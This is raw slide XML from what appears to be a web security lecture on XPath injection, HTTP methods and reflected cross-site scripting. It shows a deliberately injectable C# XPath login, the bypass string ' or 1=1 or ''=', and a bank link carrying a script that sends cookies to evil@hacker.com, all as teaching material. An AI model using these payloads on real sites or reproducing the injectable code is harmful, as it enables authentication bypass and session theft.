                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connection.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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1633032338"/>
      </p:ext>
    </p:extLst>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3588" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XPath Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="963589" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used to build expressions that describe parts of an XML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expression can be used to query an XML document as it was a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expression returns the account number of user “john” with password “doe” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>string(//user[name/text()='john’ and password/text()=’doe']/account/text())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the string is based on user input, it is possible to affect the query process in a way similar to SQL injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112735007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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XPath Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>XmlDocument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>XmlDoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>XmlDocument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>XmlDoc.Load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("...");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>XPathNavigator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>XmlDoc.CreateNavigator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>XPathExpression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>nav.Compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("string(//user[name/text()='"+TextBox1.Text+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>        "'and password/text()='"+TextBox2.Text+"']/account/text())");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>String account=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Convert.ToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>nav.Evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    if (account=="") {        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>name+password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> pair is not found in the XML document -         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      // login failed.        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    } else {        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      // account found -&gt; Login succeeded.         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      // Proceed into the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And now username is ' or 1=1 or ''=’ so that the expression becomes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>string(//user[name/text()='' or 1=1 or ''='' and password/text()=’doe']/account/text())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which is equivalent to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>string(//user/account/text()) // non-empty result</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9558389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a:t>Accessing User Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side user information can be accessed in a number of ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drive-by-download attacks allow a malicious server to execute arbitrary commands on the user’s host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually performs installation of some kind of malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A host under the control of the attacker can impersonate a legitimate security-critical server (phishing attacks) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript code can be injected in a page to steal critical information associated with a web application (cross-site scripting attacks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user can be tricked into performing unwanted operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site request forgery attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397338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Less-Used Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OPTIONS requests information about the communication options available on the request/response chain identified by the URL (a URL of “*” identifies the options of the server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PUT requests that the enclosed entity be stored under the supplied URL (note that this is different from the POST request where the URL specifies the server-side component that will process the content)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324926120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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS attacks are used to bypass JavaScript’s same-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reflected attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stored attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>DOM-based attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attacker-provided code is used when modifying the document using the DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188409819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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reflected Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broken links are a pain and sometimes a site tries to be user-friendly by providing meaningful error messages:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>404 page does not exist: ~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>secrets.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker lures the user to visit a page written by the attacker and to follow a link to a sensitive, trusted site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The link is in the form:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.usbank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/&lt;script&gt;send-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>CookieTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>evil@hacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;”&gt;US Bank&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114798098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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reflected Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The target trusted site cannot find the requested file and returns to the user a page containing the JavaScript code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The JavaScript code is executed in the context of the website that returned the error page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access all the information that a user stored in association with the trusted site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access the session token in a cookie and reuse it to login into the same trusted site as the user, provided that the user has a current session with that site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can open a form that appears to be from the trusted site and steal PINs and passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35412704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Reflected Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="-363092"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rot="5400000">
            <a:off x="2809495"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3" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
